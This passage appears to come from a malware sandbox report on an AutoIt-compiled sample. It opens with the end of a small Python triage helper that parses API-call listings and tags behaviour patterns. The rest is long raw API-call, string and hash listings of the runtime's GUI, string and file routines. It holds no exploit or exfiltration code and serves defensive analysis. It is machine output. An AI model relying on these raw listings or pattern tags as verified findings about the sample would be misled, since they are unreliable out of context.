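        hits.append("AutoIt runtime window class")
    return sorted(hits)


# Sample input: bullets copied from the listings on this page (the drive-type
# function plus two of the GUI functions).
SAMPLE = r"""
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0036E45E
• GetDriveTypeW.KERNEL32(?,003BDC88,?,\\.\,003BDBF0), ref: 0036E54B
• SetErrorMode.KERNEL32(00000000,003BDC88,?,\\.\,003BDBF0), ref: 0036E6B1
• CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 0037A57F
• DestroyWindow.USER32 ref: 00324956
  • Part of subcall function 003249CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00324954,00000000), ref: 00324A23
Strings
"""

if __name__ == "__main__":
    parsed = parse_listing(SAMPLE)
    for c in parsed:
        print(f"{c.ref:08X} {c.module:<9}{c.api}({','.join(c.args)})")
    print(dict(module_counts(parsed)))
    print(match_patterns(parsed))
```

Feeding a whole function's bullets to `match_patterns` answers the triage question the report's signature line asserts: the drive-type function matches "drive enumeration", and the GUI function carrying the "AutoIt v3" class confirms the AutoIt runtime. Subcall bullets are kept with their callee address so that behaviour seen only in a called helper (as in the "Part of subcall function" lines above) is still attributed to the listing it appears in.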
                                        APIs
                                        • DestroyWindow.USER32 ref: 00324956
                                        • DeleteObject.GDI32(00000000), ref: 00324998
                                        • DeleteObject.GDI32(00000000), ref: 003249A3
                                        • DestroyCursor.USER32(00000000), ref: 003249AE
                                        • DestroyWindow.USER32(00000000), ref: 003249B9
                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 0039E179
                                        • 6FB80200.COMCTL32(?,000000FF,?), ref: 0039E1B2
                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0039E5E0
                                          • Part of subcall function 003249CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00324954,00000000), ref: 00324A23
                                        • SendMessageW.USER32 ref: 0039E627
                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0039E63E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: DestroyMessageSendWindow$DeleteObject$B80200CursorInvalidateMoveRect
                                        • String ID: 0$@U=u
                                        • API String ID: 295266683-975001249
                                        • Opcode ID: e0fc44509f831004280c263088db48a31d78611b1ef8f6fa2f1f382867d6f4f9
                                        • Instruction ID: 2283473b8604279f399ca7c6299d90c36b6d0d70a708d15f967fff1a6064fc7d
                                        • Opcode Fuzzy Hash: e0fc44509f831004280c263088db48a31d78611b1ef8f6fa2f1f382867d6f4f9
                                        • Instruction Fuzzy Hash: A112B030600211EFDF26DF14D884BAABBE9BF06304F154569F59ADB662C731EC85CB91
                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0038C598
                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0038C64E
                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 0038C669
                                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0038C925
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window
                                        • String ID: 0$@U=u
                                        • API String ID: 2326795674-975001249
                                        • Opcode ID: a9960beaee4c4bd40a960aa1ca2873e0fa468a5c737beaeb125757dc4a2a003f
                                        • Instruction ID: 73168b5d01d65823ad4b89fd5e0056efe091affb179f641b42b93355549be6d1
                                        • Opcode Fuzzy Hash: a9960beaee4c4bd40a960aa1ca2873e0fa468a5c737beaeb125757dc4a2a003f
                                        • Instruction Fuzzy Hash: 56F11571224341AFE717EF24CC84BAABBE8FF49354F081669F589D62A1C774C840CB62
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: __wcsnicmp
                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                        • API String ID: 1038674560-86951937
                                        • Opcode ID: a831d89879fc7375970004052c47c3d0cfc2ff2495672755d9c0332ffbfa6a49
                                        • Instruction ID: de559b17fecad796c71b2c35817b16565bc0aa4c1d0608b7763b5f20c9cb2944
                                        • Opcode Fuzzy Hash: a831d89879fc7375970004052c47c3d0cfc2ff2495672755d9c0332ffbfa6a49
                                        • Instruction Fuzzy Hash: 986149716407267BDB23AA29AC82FFF339CEF15744F045025FD42AF582EB60DA41C6A1
                                        APIs
                                        • CharUpperBuffW.USER32(?,?,003BDBF0), ref: 00386245
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper
                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                        • API String ID: 3964851224-45149045
                                        • Opcode ID: 87dc35bb1b0a0a269a260abe9c380b93a8dea9c08a72544c5485f3c222a5bb16
                                        • Instruction ID: 1202286106c34a4507f65de4fb96a846419539629366c06c4babfa814ef06b90
                                        • Opcode Fuzzy Hash: 87dc35bb1b0a0a269a260abe9c380b93a8dea9c08a72544c5485f3c222a5bb16
                                        • Instruction Fuzzy Hash: FFC194352043018FCB0BFF14D452A6E7796AF95354F4448A9F8865F7A6DB31DD0ACB82
                                        APIs
                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0038B5C0
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0038B5D1
                                        • CharNextW.USER32(0000014E), ref: 0038B600
                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0038B641
                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0038B657
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0038B668
                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0038B685
                                        • SetWindowTextW.USER32(?,0000014E), ref: 0038B6D7
                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0038B6ED
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 0038B71E
                                        • _memset.LIBCMT ref: 0038B743
                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0038B78C
                                        • _memset.LIBCMT ref: 0038B7EB
                                        • SendMessageW.USER32 ref: 0038B815
                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 0038B86D
                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 0038B91A
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0038B93C
                                        • GetMenuItemInfoW.USER32(?), ref: 0038B986
                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0038B9B3
                                        • DrawMenuBar.USER32(?), ref: 0038B9C2
                                        • SetWindowTextW.USER32(?,0000014E), ref: 0038B9EA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                        • String ID: 0$@U=u
                                        • API String ID: 1073566785-975001249
                                        • Opcode ID: db22c8aa7f9921e5398c07473fc3a3e91fda645d63399401c4ff6fe9005dcec7
                                        • Instruction ID: 01e067ff81ab4ffa06fb2e88d0d4641ec86b4b54e84697be88d2e754d7832e66
                                        • Opcode Fuzzy Hash: db22c8aa7f9921e5398c07473fc3a3e91fda645d63399401c4ff6fe9005dcec7
                                        • Instruction Fuzzy Hash: BEE15E7590031AABDF22AF51CC84EEEBBB8FF06750F108196F915AB190DB749A41CF60
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 00387587
                                        • GetDesktopWindow.USER32 ref: 0038759C
                                        • GetWindowRect.USER32(00000000), ref: 003875A3
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00387605
                                        • DestroyWindow.USER32(?), ref: 00387631
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0038765A
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00387678
                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0038769E
                                        • SendMessageW.USER32(?,00000421,?,?), ref: 003876B3
                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 003876C6
                                        • IsWindowVisible.USER32(?), ref: 003876E6
                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00387701
                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00387715
                                        • GetWindowRect.USER32(?,?), ref: 0038772D
                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00387753
                                        • GetMonitorInfoW.USER32 ref: 0038776D
                                        • CopyRect.USER32(?,?), ref: 00387784
                                        • SendMessageW.USER32(?,00000412,00000000), ref: 003877EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Similarity
                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                        • String ID: ($0$tooltips_class32
                                        • API String ID: 698492251-4156429822
                                        • Opcode ID: 07e17ce091ddb9a7edfc6108eb8b86b6f48ad78353065a80ca34de0ac500dfde
                                        • Instruction ID: 7ee4dced330fabf360adac70a530f0121e6a312df8f66900ce94e550dfb57fac
                                        • Opcode Fuzzy Hash: 07e17ce091ddb9a7edfc6108eb8b86b6f48ad78353065a80ca34de0ac500dfde
                                        • Instruction Fuzzy Hash: 6FB1AF71608300AFDB05EF64D984B6EBBE9FF89310F108A5DF5999B291DB70E805CB91
                                        APIs
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0033A839
                                        • GetSystemMetrics.USER32(00000007), ref: 0033A841
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0033A86C
                                        • GetSystemMetrics.USER32(00000008), ref: 0033A874
                                        • GetSystemMetrics.USER32(00000004), ref: 0033A899
                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0033A8B6
                                        • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0033A8C6
                                        • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0033A8F9
                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0033A90D
                                        • GetClientRect.USER32(00000000,000000FF), ref: 0033A92B
                                        • GetStockObject.GDI32(00000011), ref: 0033A947
                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0033A952
                                          • Part of subcall function 0033B736: GetCursorPos.USER32(000000FF), ref: 0033B749
                                          • Part of subcall function 0033B736: ScreenToClient.USER32(00000000,000000FF), ref: 0033B766
                                          • Part of subcall function 0033B736: GetAsyncKeyState.USER32(00000001), ref: 0033B78B
                                          • Part of subcall function 0033B736: GetAsyncKeyState.USER32(00000002), ref: 0033B799
                                        • SetTimer.USER32(00000000,00000000,00000028,0033ACEE), ref: 0033A979
                                        Strings
                                        Similarity
                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                        • String ID: @U=u$AutoIt v3 GUI
                                        • API String ID: 1458621304-2077007950
                                        • Opcode ID: b5fb1eccd40e11034ae765285b819b9516444378428cdf01076bda286164b7d7
                                        • Instruction ID: 1d2993d5144ec636b0a70d5f715da4d9eaccd2a46b0ff08c30339677d05c4fc2
                                        • Opcode Fuzzy Hash: b5fb1eccd40e11034ae765285b819b9516444378428cdf01076bda286164b7d7
                                        • Instruction Fuzzy Hash: 9FB18E71A0060AEFDB16DFA8CC85BAD7BB8FB08314F114229FA56AB2D0D734D840CB51
                                        APIs
                                        • LoadIconW.USER32(00000063), ref: 0035F8AB
                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0035F8BD
                                        • SetWindowTextW.USER32(?,?), ref: 0035F8D4
                                        • GetDlgItem.USER32(?,000003EA), ref: 0035F8E9
                                        • SetWindowTextW.USER32(00000000,?), ref: 0035F8EF
                                        • GetDlgItem.USER32(?,000003E9), ref: 0035F8FF
                                        • SetWindowTextW.USER32(00000000,?), ref: 0035F905
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0035F926
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0035F940
                                        • GetWindowRect.USER32(?,?), ref: 0035F949
                                        • SetWindowTextW.USER32(?,?), ref: 0035F9B4
                                        • GetDesktopWindow.USER32 ref: 0035F9BA
                                        • GetWindowRect.USER32(00000000), ref: 0035F9C1
                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0035FA0D
                                        • GetClientRect.USER32(?,?), ref: 0035FA1A
                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0035FA3F
                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0035FA6A
                                        Strings
                                        Similarity
                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                        • String ID: @U=u
                                        • API String ID: 3869813825-2594219639
                                        • Opcode ID: e2ef1639f47b4330fde27e1d6e294c377f44b4463673cd4c9721c49f589d248f
                                        • Instruction ID: 7ce1062c8c019e15a042087593fdcc3025a71fe0d5956713e44c4940e799f00e
                                        • Opcode Fuzzy Hash: e2ef1639f47b4330fde27e1d6e294c377f44b4463673cd4c9721c49f589d248f
                                        • Instruction Fuzzy Hash: B9515F70900709AFDB229FA8CD85FAEBBF9FF04705F014928E596A65B0C774A948CF10
                                        APIs
                                        • CharUpperBuffW.USER32(?,?), ref: 00386A52
                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00386B12
                                        Strings
                                        Similarity
                                        • API ID: BuffCharMessageSendUpper
                                        • String ID: @U=u$DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                        • API String ID: 3974292440-1753161424
                                        • Opcode ID: 2eafddf313cb417227ada1acba8fc703d7fc716644217507f6509b3865e57ef4
                                        • Instruction ID: b0888c839375614208b5a18b81210c036a625c5121af5d22641b038d1d00ce2d
                                        • Opcode Fuzzy Hash: 2eafddf313cb417227ada1acba8fc703d7fc716644217507f6509b3865e57ef4
                                        • Instruction Fuzzy Hash: 69A160346143019FCB0AFF24C992A6AB3A5FF45354F1488A9F8969F392DB30ED09CB41
                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0038E564
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0038E57B
                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0038E586
                                        • CloseHandle.KERNEL32(00000000), ref: 0038E593
                                        • GlobalLock.KERNEL32(00000000), ref: 0038E59C
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0038E5AB
                                        • GlobalUnlock.KERNEL32(00000000), ref: 0038E5B4
                                        • CloseHandle.KERNEL32(00000000), ref: 0038E5BB
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0038E5CC
                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,003AD9BC,?), ref: 0038E5E5
                                        • GlobalFree.KERNEL32(00000000), ref: 0038E5F5
                                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 0038E619
                                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0038E644
                                        • DeleteObject.GDI32(00000000), ref: 0038E66C
                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0038E682
                                        Strings
                                        Similarity
                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                        • String ID: @U=u
                                        • API String ID: 3840717409-2594219639
                                        • Opcode ID: 6976d1d67ec082a9160d624efa052a13c46e83954bb612c3294e585c7940af42
                                        • Instruction ID: faa929f28ac9348dfeb1185f202b3f77bddea55fcb6039197f027608ccbad893
                                        • Opcode Fuzzy Hash: 6976d1d67ec082a9160d624efa052a13c46e83954bb612c3294e585c7940af42
                                        • Instruction Fuzzy Hash: F0413875600204BFDB12AF65DC88EABBBBDEF8A715F108598F906D7660D731AD01DB20
                                        APIs
                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 0035E6E1
                                        • _wcscmp.LIBCMT ref: 0035E6F2
                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 0035E71A
                                        • CharUpperBuffW.USER32(?,00000000), ref: 0035E737
                                        • _wcscmp.LIBCMT ref: 0035E755
                                        • _wcsstr.LIBCMT ref: 0035E766
                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0035E79E
                                        • _wcscmp.LIBCMT ref: 0035E7AE
                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 0035E7D5
                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0035E81E
                                        • _wcscmp.LIBCMT ref: 0035E82E
                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 0035E856
                                        • GetWindowRect.USER32(00000004,?), ref: 0035E8BF
                                        Strings
                                        Similarity
                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                        • String ID: @$ThumbnailClass
                                        • API String ID: 1788623398-1539354611
                                        • Opcode ID: 2f56a07fe0c8418d0909d159dbffc5c9dfb871c71d3a0ed3753a3fbbaee2662a
                                        • Instruction ID: b3457e53d3cd069eda8f4a25dd46bcdb79f897a8692d27aec39081fa9011b227
                                        • Opcode Fuzzy Hash: 2f56a07fe0c8418d0909d159dbffc5c9dfb871c71d3a0ed3753a3fbbaee2662a
                                        • Instruction Fuzzy Hash: D481B4710083059FDB0ACF10C885FAA7BE8FF44755F04846AFD8A9A0A5DB34DE49CBA1
                                        APIs
                                        • _memset.LIBCMT ref: 0038CD0B
                                        • DestroyWindow.USER32(00000000,?), ref: 0038CD83
                                          • Part of subcall function 00327E53: _memmove.LIBCMT ref: 00327EB9
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0038CE04
                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0038CE26
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0038CE35
                                        • DestroyWindow.USER32(?), ref: 0038CE52
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00320000,00000000), ref: 0038CE85
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0038CEA4
                                        • GetDesktopWindow.USER32 ref: 0038CEB9
                                        • GetWindowRect.USER32(00000000), ref: 0038CEC0
                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0038CED2
                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0038CEEA
                                          • Part of subcall function 0033B155: GetWindowLongW.USER32(?,000000EB), ref: 0033B166
                                        Strings
                                        Similarity
                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                        • String ID: 0$@U=u$tooltips_class32
                                        • API String ID: 1297703922-1130792468
                                        • Opcode ID: 47c17955a426685848da62e67b0292f1c5905659ee21a7e1182b4091b28be4ae
                                        • Instruction ID: de30b24f687e33dc07d1b1c8c0b09ceea69c3437dfac8c50240b408eca2a8d4a
                                        • Opcode Fuzzy Hash: 47c17955a426685848da62e67b0292f1c5905659ee21a7e1182b4091b28be4ae
                                        • Instruction Fuzzy Hash: 1A710071160349AFD726DF28CC85FAA3BE9FB89744F44059CF9859B2A1DB70E801CB21
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: __wcsnicmp
                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                        • API String ID: 1038674560-1810252412
                                        • Opcode ID: 9a99b14ed0c6060d53b8eab6093762c26d7ff56cabbe5adc0de33e34df6bbe91
                                        • Instruction ID: 70ac02d4645f2d516e2fdb8bf448817c12351f751826f0882e366f428bae84ad
                                        • Opcode Fuzzy Hash: 9a99b14ed0c6060d53b8eab6093762c26d7ff56cabbe5adc0de33e34df6bbe91
                                        • Instruction Fuzzy Hash: 3C31E432944215A6DB2BFB50ED13EEF73A4AF21B45F200426F9517A1E5FF61AF08C611
                                        APIs
                                        • CharUpperBuffW.USER32(?,?), ref: 00386FF9
                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00387044
                                        Strings
                                        Similarity
                                        • API ID: BuffCharMessageSendUpper
                                        • String ID: @U=u$CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                        • API String ID: 3974292440-383632319
                                        • Opcode ID: 242b07d5863e4aa27d77f077a9f1a122efca7bcf39b3820d31a24c0cf816a47b
                                        • Instruction ID: 5d4cb70aec7a350b5f221fd45bb8c1f2a26c13372d1df50a76e50ac2313522b7
                                        • Opcode Fuzzy Hash: 242b07d5863e4aa27d77f077a9f1a122efca7bcf39b3820d31a24c0cf816a47b
                                        • Instruction Fuzzy Hash: B491B6746087019FCB16FF14C891A6AB7A2AF94350F14489DF8965F7A3DB31ED0ACB41
                                        APIs
                                        • _wcscpy.LIBCMT ref: 0037026A
                                        • _wcschr.LIBCMT ref: 00370278
                                        • _wcscpy.LIBCMT ref: 0037028F
                                        • _wcscat.LIBCMT ref: 0037029E
                                        • _wcscat.LIBCMT ref: 003702BC
                                        • _wcscpy.LIBCMT ref: 003702DD
                                        • __wsplitpath.LIBCMT ref: 003703BA
                                        • _wcscpy.LIBCMT ref: 003703DF
                                        • _wcscpy.LIBCMT ref: 003703F1
                                        • _wcscpy.LIBCMT ref: 00370406
                                        • _wcscat.LIBCMT ref: 0037041B
                                        • _wcscat.LIBCMT ref: 0037042D
                                        • _wcscat.LIBCMT ref: 00370442
                                          • Part of subcall function 0036C890: _wcscmp.LIBCMT ref: 0036C92A
                                          • Part of subcall function 0036C890: __wsplitpath.LIBCMT ref: 0036C96F
                                          • Part of subcall function 0036C890: _wcscpy.LIBCMT ref: 0036C982
                                          • Part of subcall function 0036C890: _wcscat.LIBCMT ref: 0036C995
                                          • Part of subcall function 0036C890: __wsplitpath.LIBCMT ref: 0036C9BA
                                          • Part of subcall function 0036C890: _wcscat.LIBCMT ref: 0036C9D0
                                          • Part of subcall function 0036C890: _wcscat.LIBCMT ref: 0036C9E3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                        • String ID: >>>AUTOIT SCRIPT<<<
                                        • API String ID: 2955681530-2806939583
                                        • Opcode ID: 31c8101800617a574736322b6fce96056730a70a86d8ee842835f9cd00645379
                                        • Instruction ID: 9ed05e0b5d2095eb56455715f68738147aee78c012606c2078f51f281e0cb895
